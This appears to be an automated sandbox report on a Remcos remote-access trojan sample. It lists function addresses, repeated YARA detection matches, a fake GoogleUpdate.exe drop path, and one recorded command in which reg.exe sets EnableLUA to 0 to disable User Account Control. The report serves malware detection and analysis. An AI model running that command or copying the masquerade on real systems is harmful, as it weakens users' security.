Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_00435AD3	18_2_00435AD3
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_00424BC3	18_2_00424BC3
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_0043DBFB	18_2_0043DBFB
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_0044ABA9	18_2_0044ABA9
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_00433C0B	18_2_00433C0B
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_00434D8A	18_2_00434D8A
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_0043DE2A	18_2_0043DE2A
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_0041CEAF	18_2_0041CEAF
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_00435F08	18_2_00435F08

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02D52073 appears 51 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02D82B90 appears 53 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02D82525 appears 41 times
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: String function: 00402073 appears 51 times
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: String function: 00432B90 appears 53 times
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: String function: 00432525 appears 42 times
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: String function: 004046D7 appears 48 times
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: String function: 004052DD appears 47 times
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: String function: 00401F8B appears 48 times
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: String function: 0040415E appears 80 times
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: String function: 00402073 appears 151 times
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: String function: 004109CC appears 45 times
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: String function: 00439E5F appears 39 times
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: String function: 00401E45 appears 52 times
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: String function: 00401F66 appears 36 times
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: String function: 0043AA74 appears 39 times
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: String function: 00432B90 appears 159 times
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: String function: 004021F3 appears 57 times
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: String function: 004020BF appears 57 times
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: String function: 00432525 appears 126 times
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: String function: 004459F9 appears 54 times
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: String function: 00442DE2 appears 84 times
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: String function: 00454C08 appears 51 times

Source: DB5rQYsfd6.exe, 00000000.00000002.1669075854.000000000059E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs DB5rQYsfd6.exe
Source: DB5rQYsfd6.exe, 00000000.00000002.1669075854.000000000059E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs DB5rQYsfd6.exe

Source: DB5rQYsfd6.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Source: DB5rQYsfd6.exe, type: SAMPLE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: DB5rQYsfd6.exe, type: SAMPLE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: DB5rQYsfd6.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 20.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 18.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 18.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 22.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 22.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 22.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 10.2.GoogleUpdate.exe.2a00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 10.2.GoogleUpdate.exe.2a00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.GoogleUpdate.exe.2a00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 13.2.svchost.exe.2d50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.svchost.exe.2d50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.svchost.exe.2d50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 13.2.svchost.exe.2d50000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.svchost.exe.2d50000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.svchost.exe.2d50000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 27.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 27.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 27.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 22.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 22.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 22.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 25.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 25.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 25.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 10.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 10.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.0.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.0.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.0.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 27.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 27.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 27.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 10.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 10.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 10.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 20.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 25.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 25.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 25.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 10.2.GoogleUpdate.exe.6abe60.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 10.2.GoogleUpdate.exe.6abe60.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.GoogleUpdate.exe.6abe60.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 10.2.GoogleUpdate.exe.2a00000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
